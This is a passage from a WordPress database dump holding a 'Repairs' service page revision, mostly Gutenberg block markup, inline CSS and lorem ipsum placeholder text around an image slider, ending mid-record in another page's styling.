{\"block_id\":\"1a6b31cd-8a87-4edc-99f2-33dd2b097132\",\"showSubHeading\":false,\"showSeparator\":false,\"headSpacing\":10,\"headingTitleFontFamily\":\"Teko\",\"headingTitleFontSize\":52,\"headingTitleFontSizeMobile\":30,\"headingTitleFontSizeTablet\":32,\"headingTitleFontWeight\":\"700\",\"headingTitleLineHeight\":1.2,\"headingTitleLetterSpacing\":1,\"headingTitleColor\":\"#343434\",\"headingAlignment\":\"left\",\"headingAlignmentTablet\":\"left\",\"headingAlignmentMobile\":\"left\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-1a6b31cd-8a87-4edc-99f2-33dd2b097132 .responsive-heading-title-text {\n font-size: 52px !important; margin-bottom: 10px !important; }\n\n.skt-blocks-block-advanced-heading.block-1a6b31cd-8a87-4edc-99f2-33dd2b097132 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-1a6b31cd-8a87-4edc-99f2-33dd2b097132 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-1a6b31cd-8a87-4edc-99f2-33dd2b097132 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-1a6b31cd-8a87-4edc-99f2-33dd2b097132 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-1a6b31cd-8a87-4edc-99f2-33dd2b097132 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-1a6b31cd-8a87-4edc-99f2-33dd2b097132 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-1a6b31cd-8a87-4edc-99f2-33dd2b097132 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-1a6b31cd-8a87-4edc-99f2-33dd2b097132 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-1a6b31cd-8a87-4edc-99f2-33dd2b097132 .responsive-heading-title-text {\n font-size: 32px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-1a6b31cd-8a87-4edc-99f2-33dd2b097132 .responsive-heading-title-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-1a6b31cd-8a87-4edc-99f2-33dd2b097132 .responsive-heading-desc-text {\n font-size: undefinedpx !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-1a6b31cd-8a87-4edc-99f2-33dd2b097132 {\n text-align: left; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-1a6b31cd-8a87-4edc-99f2-33dd2b097132 {\n text-align: left; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-1a6b31cd-8a87-4edc-99f2-33dd2b097132 {\n text-align: left; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-1a6b31cd-8a87-4edc-99f2-33dd2b097132\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Teko;font-weight:700;line-height:1.2;letter-spacing:1px;color:#343434\">Fusce congue augue sollicitudin dignissim ultricies</h2></div>\n<!-- /wp:skt-blocks/advanced-heading -->\n\n<!-- wp:paragraph {\"style\":{\"color\":{\"text\":\"#494848\"}},\"className\":\"section-content\",\"fontSize\":\"normal\"} -->\n<p class=\"section-content has-text-color has-normal-font-size\" style=\"color:#494848\">Fusce congue augue sollicitudin dignissim ultricies. Pellentesque id tristique quam. Aliquam pharetra vehicula dolor, et dictum ante males mollis. Aenean ultricies vulputate urna eget fringilla.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph {\"style\":{\"color\":{\"text\":\"#494848\"}},\"className\":\"section-content\",\"fontSize\":\"normal\"} -->\n<p class=\"section-content has-text-color has-normal-font-size\" style=\"color:#494848\">Morbi fringilla ex ut velit gravida, a tempus dui rutrum. Maecenas feugiatings lorem et neque tristique, pulvinar pulvinar ligula convallis. Mauris dictiumoe augue sed rhoncus ultricies. Donec mi purus, viverra eget vulputate ac, finiee</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph {\"className\":\"section-content\"} -->\n<p class=\"section-content\">bus nec velit. Mauris hendrerit, neque eu dictum efficitur, ipsum urna andyee semper lorem, vitae hendrerit diam tortor nec nibh. Fusce a pharetra libero. Morbi rhoncus sem at ligula tempus varius. Cras erat ipsum, accpellentesque egestas a, condimen in ante. Quisque in felis quam. Cras at ultricie mi purus, viverra eget vulputate ac, finiee bus nec velit.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:skt-blocks/advance-columns {\"columns\":1,\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"d5c61675-ddb2-4433-a568-128785b48d5b\"} -->\n<style type=\"text/css\"> .block-d5c61675-ddb2-4433-a568-128785b48d5b .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-d5c61675-ddb2-4433-a568-128785b48d5b .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-d5c61675-ddb2-4433-a568-128785b48d5b .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-d5c61675-ddb2-4433-a568-128785b48d5b .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-d5c61675-ddb2-4433-a568-128785b48d5b .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-d5c61675-ddb2-4433-a568-128785b48d5b .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-d5c61675-ddb2-4433-a568-128785b48d5b .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-d5c61675-ddb2-4433-a568-128785b48d5b skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-1\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"width\":100,\"topPadding\":30,\"bottomPadding\":30,\"topPaddingTablet\":30,\"bottomPaddingTablet\":30,\"topPaddingMobile\":30,\"bottomPaddingMobile\":30,\"blockId\":\"72780545-3bc2-4038-8814-1dd9138d037c\"} -->\n<style type=\"text/css\"> .block-72780545-3bc2-4038-8814-1dd9138d037c .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-72780545-3bc2-4038-8814-1dd9138d037c .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-72780545-3bc2-4038-8814-1dd9138d037c .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-72780545-3bc2-4038-8814-1dd9138d037c .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-72780545-3bc2-4038-8814-1dd9138d037c .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-72780545-3bc2-4038-8814-1dd9138d037c\" style=\"width:100%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/image-slider {\"gutter\":0,\"gutterMobile\":0,\"lightbox\":true,\"gridSize\":\"xlrg\",\"height\":500,\"autoPlay\":true,\"autoPlaySpeed\":\"3000\",\"borderWidth\":10,\"iconBackgroundRadius\":0,\"iconBackgroundOpacity\":100,\"iconBackgroundColor\":\"#ffffff\",\"borderColor\":\"#0d2e63\",\"iconColor\":\"#012257\",\"borderStyle\":\"solid\",\"counterId\":\"084a0777-f0fe-40d8-8160-5e5511fafb42\"} -->\n<style type=\"text/css\"> .block-id-084a0777-f0fe-40d8-8160-5e5511fafb42 .flickity-button .flickity-button-icon {\n fill: #012257; }\n .skt-blocks-gallery.block-id-084a0777-f0fe-40d8-8160-5e5511fafb42 .flickity-button {\n background-color: rgba(255, 255, 255, 1); border-radius: 0%; }\n .block-id-084a0777-f0fe-40d8-8160-5e5511fafb42 .skt-blocks-gallery--item figure {\n height: 480px; }\n</style><div class=\"\"><div class=\"block-id-084a0777-f0fe-40d8-8160-5e5511fafb42 is-cropped skt-blocks-gallery has-no-alignment has-caption-style-dark has-lightbox\"><div class=\"has-carousel has-carousel-xlrg\" style=\"height:500px\" data-flickity=\"{&quot;autoPlay&quot;:3000,&quot;draggable&quot;:true,&quot;pageDots&quot;:false,&quot;prevNextButtons&quot;:true,&quot;wrapAround&quot;:true,&quot;cellAlign&quot;:&quot;center&quot;,&quot;pauseAutoPlayOnHover&quot;:false,&quot;freeScroll&quot;:false,&quot;arrowShape&quot;:{&quot;x0&quot;:10,&quot;x1&quot;:60,&quot;y1&quot;:50,&quot;x2&quot;:65,&quot;y2&quot;:45,&quot;x3&quot;:20},&quot;thumbnails&quot;:false,&quot;responsiveHeight&quot;:false}\"><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#0d2e63\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/1.jpg\" alt=\"\" data-id=\"467\" data-link=\"https://cteisys.com/services/repairs/attachment/1/\" class=\"wp-image-467\"/></figure></div><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#0d2e63\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/2.jpg\" alt=\"\" data-id=\"468\" data-link=\"https://cteisys.com/services/repairs/attachment/2/\" class=\"wp-image-468\"/></figure></div><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#0d2e63\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/3.jpg\" alt=\"\" data-id=\"469\" data-link=\"https://cteisys.com/services/repairs/attachment/3/\" class=\"wp-image-469\"/></figure></div></div></div></div>\n<!-- /wp:skt-blocks/image-slider --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns -->\n\n<!-- wp:paragraph {\"style\":{\"color\":{\"text\":\"#494848\"}},\"className\":\"section-content\",\"fontSize\":\"normal\"} -->\n<p class=\"section-content has-text-color has-normal-font-size\" style=\"color:#494848\">Fusce congue augue sollicitudin dignissim ultricies. Pellentesque id tristique quam. Aliquam pharetra vehicula dolor, et dictum ante males mollis. Aenean ultricies vulputate urna eget fringilla.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:skt-blocks/advanced-heading {\"block_id\":\"bad42304-f956-4ff6-a71d-3d0927546977\",\"showSubHeading\":false,\"showSeparator\":false,\"headSpacing\":10,\"headingTitleFontFamily\":\"Teko\",\"headingTitleFontSize\":44,\"headingTitleFontSizeMobile\":30,\"headingTitleFontSizeTablet\":32,\"headingTitleFontWeight\":\"700\",\"headingTitleLineHeight\":1.2,\"headingTitleLetterSpacing\":1,\"headingTitleColor\":\"#343434\",\"headingAlignment\":\"left\",\"headingAlignmentTablet\":\"left\",\"headingAlignmentMobile\":\"left\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-bad42304-f956-4ff6-a71d-3d0927546977 .responsive-heading-title-text {\n font-size: 44px !important; margin-bottom: 10px !important; }\n\n.skt-blocks-block-advanced-heading.block-bad42304-f956-4ff6-a71d-3d0927546977 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-bad42304-f956-4ff6-a71d-3d0927546977 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-bad42304-f956-4ff6-a71d-3d0927546977 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-bad42304-f956-4ff6-a71d-3d0927546977 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-bad42304-f956-4ff6-a71d-3d0927546977 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-bad42304-f956-4ff6-a71d-3d0927546977 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-bad42304-f956-4ff6-a71d-3d0927546977 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-bad42304-f956-4ff6-a71d-3d0927546977 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-bad42304-f956-4ff6-a71d-3d0927546977 .responsive-heading-title-text {\n font-size: 32px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-bad42304-f956-4ff6-a71d-3d0927546977 .responsive-heading-title-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-bad42304-f956-4ff6-a71d-3d0927546977 .responsive-heading-desc-text {\n font-size: undefinedpx !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-bad42304-f956-4ff6-a71d-3d0927546977 {\n text-align: left; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-bad42304-f956-4ff6-a71d-3d0927546977 {\n text-align: left; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-bad42304-f956-4ff6-a71d-3d0927546977 {\n text-align: left; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-bad42304-f956-4ff6-a71d-3d0927546977\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Teko;font-weight:700;line-height:1.2;letter-spacing:1px;color:#343434\">Where Caring for Our Community matters</h2></div>\n<!-- /wp:skt-blocks/advanced-heading -->\n\n<!-- wp:paragraph {\"className\":\"section-content\"} -->\n<p class=\"section-content\">Fusce congue augue sollicitudin dignissim ultricies. Pellentesque id tristique quam. Aliquam pharetra vehicula dolor, et dictum ante males mollis. Aenean ultricies vulputate urna eget fringilla.Morbi fringilla ex ut velit gravida, a tempus dui rutrum. Maecenas feugiatings lorem et neque tristique, pulvinar andye pulvinar ligula convallis. Mauris dictiumoe augue sed rhoncus ultricies. Donec mi purus, viverra egetine vulputate ac, finieebus nec velit. Mauris hendrerit, neque eu dictum efficitur, ipsum urna andyee sempr lorem, vitae hendrerit diam tortor nec nibh. Fusce a pharetra libero.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:skt-blocks/section {\"blockId\":\"8f988807-9a52-467a-ae6e-048f9f4c3534\",\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0} -->\n<div class=\"wp-block-skt-blocks-section skt-blocks-block-section-outer-wrap block-8f988807-9a52-467a-ae6e-048f9f4c3534 background-type-none alignundefined\" style=\"z-index:1;max-width:900px;margin-left:auto;margin-right:auto\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-8f988807-9a52-467a-ae6e-048f9f4c3534 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-8f988807-9a52-467a-ae6e-048f9f4c3534 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-8f988807-9a52-467a-ae6e-048f9f4c3534 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; }\n}\n .block-8f988807-9a52-467a-ae6e-048f9f4c3534.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 0),rgba(255, 255, 255, 0)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-8f988807-9a52-467a-ae6e-048f9f4c3534.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-8f988807-9a52-467a-ae6e-048f9f4c3534.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-8f988807-9a52-467a-ae6e-048f9f4c3534.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-8f988807-9a52-467a-ae6e-048f9f4c3534.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 0); }\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"d7963526-9288-4aa2-9602-2bca93be416b\"} -->\n<style type=\"text/css\"> .block-d7963526-9288-4aa2-9602-2bca93be416b .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-d7963526-9288-4aa2-9602-2bca93be416b .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-d7963526-9288-4aa2-9602-2bca93be416b .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-d7963526-9288-4aa2-9602-2bca93be416b .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-d7963526-9288-4aa2-9602-2bca93be416b .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-d7963526-9288-4aa2-9602-2bca93be416b .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-d7963526-9288-4aa2-9602-2bca93be416b .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-d7963526-9288-4aa2-9602-2bca93be416b skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":5,\"rightPadding\":5,\"leftPaddingTablet\":5,\"rightPaddingTablet\":5,\"topPaddingMobile\":0,\"bottomPaddingMobile\":0,\"topMarginMobile\":0,\"bottomMarginMobile\":0,\"blockId\":\"f3c8d953-d75e-4cd0-a016-ebca0253c0de\"} -->\n<style type=\"text/css\"> .block-f3c8d953-d75e-4cd0-a016-ebca0253c0de .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-f3c8d953-d75e-4cd0-a016-ebca0253c0de .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-f3c8d953-d75e-4cd0-a016-ebca0253c0de .skt-blocks-block-column{\n padding-top: 0px; padding-bottom: 0px; padding-left: 5px; padding-right: 5px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-f3c8d953-d75e-4cd0-a016-ebca0253c0de .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 5px; padding-right: 5px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-f3c8d953-d75e-4cd0-a016-ebca0253c0de .skt-blocks-block-column{\n padding-top: 0px; padding-bottom: 0px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: 0px; margin-bottom: 0px; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-f3c8d953-d75e-4cd0-a016-ebca0253c0de\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:image {\"align\":\"center\",\"id\":21,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image aligncenter size-large\"><img src=\"https://cteisys.com/wp-content/uploads/2021/05/instruction-img.jpg\" alt=\"\" class=\"wp-image-21\"/></figure>\n<!-- /wp:image --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":5,\"rightPadding\":5,\"leftPaddingTablet\":5,\"rightPaddingTablet\":5,\"topPaddingMobile\":0,\"bottomPaddingMobile\":0,\"blockId\":\"b2950aec-7a93-4bd2-bdf0-d978b7373e18\",\"blockBorderRadius\":5} -->\n<style type=\"text/css\"> .block-b2950aec-7a93-4bd2-bdf0-d978b7373e18 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-b2950aec-7a93-4bd2-bdf0-d978b7373e18 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-b2950aec-7a93-4bd2-bdf0-d978b7373e18 .skt-blocks-block-column{\n padding-top: 0px; padding-bottom: 0px; padding-left: 5px; padding-right: 5px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-b2950aec-7a93-4bd2-bdf0-d978b7373e18 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 5px; padding-right: 5px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-b2950aec-7a93-4bd2-bdf0-d978b7373e18 .skt-blocks-block-column{\n padding-top: 0px; padding-bottom: 0px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-b2950aec-7a93-4bd2-bdf0-d978b7373e18\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none;border-radius:5px\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:image {\"align\":\"center\",\"id\":224,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image aligncenter size-large\"><img src=\"https://cteisys.com/wp-content/uploads/2021/05/services-single.jpg\" alt=\"\" class=\"wp-image-224\"/></figure>\n<!-- /wp:image --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:paragraph {\"className\":\"section-content\"} -->\n<p class=\"section-content\">Fusce congue augue sollicitudin dignissim ultricies. Pellentesque id tristique quam. Aliquam pharetra vehicula dolor, et dictum ante males mollis. Aenean ultricies vulputate urna eget fringilla.Morbi fringilla ex ut velit gravida, a tempus dui rutrum. Maecenas feugiatings lorem et neque tristique, pulvinar andye pulvinar ligula convallis. Mauris dictiumoe augue sed rhoncus ultricies. Donec mi purus, viverra egetine vulputate ac, finieebus nec velit. Mauris hendrerit, neque eu dictum efficitur, ipsum urna andyee sempr lorem, vitae hendrerit diam tortor nec nibh. Fusce a pharetra libero.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph {\"className\":\"section-content\"} -->\n<p class=\"section-content\">Fusce congue augue sollicitudin dignissim ultricies. Pellentesque id tristique quam. Aliquam pharetra vehicula dolor, et dictum ante males mollis. Aenean ultricies vulputate urna eget fringilla.Morbi fringilla ex ut velit gravida, a tempus dui rutrum. Maecenas feugiatings lorem et neque tristique, pulvinar andye pulvinar ligula convallis. Mauris dictiumoe augue sed rhoncus ultricies. Donec mi purus, viverra egetine vulputate ac, finieebus nec velit. Mauris hendrerit, neque eu dictum efficitur, ipsum urna andyee sempr lorem, vitae hendrerit diam tortor nec nibh. Fusce a pharetra libero.</p>\n<!-- /wp:paragraph --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->','Repairs','','inherit','closed','closed','','269-revision-v1','','','2022-08-24 16:41:48','2022-08-24 16:41:48','',269,'https://cteisys.com/?p=470',0,'revision','',0),(348,1,'2021-05-28 05:45:24','2021-05-28 05:45:24','<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"e06103bb-1f76-411d-8965-9c096fc83e39\",\"topPadding\":80,\"topPaddingMobile\":40,\"topPaddingTablet\":50,\"bottomPadding\":80,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":50,\"className\":\"gb-renovation-services-single\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-services-single skt-blocks-block-section-outer-wrap block-e06103bb-1f76-411d-8965-9c096fc83e39 background-type-none alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-e06103bb-1f76-411d-8965-9c096fc83e39 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 50px; padding-bottom: 50px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-e06103bb-1f76-411d-8965-9c096fc83e39 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-e06103bb-1f76-411d-8965-9c096fc83e39 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 80px; padding-bottom: 80px; padding-left: 10px; padding-right: 10px; }\n}\n .block-e06103bb-1f76-411d-8965-9c096fc83e39.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 0.2),rgba(255, 255, 255, 0.2)),url(undefined); background-position: center-center; 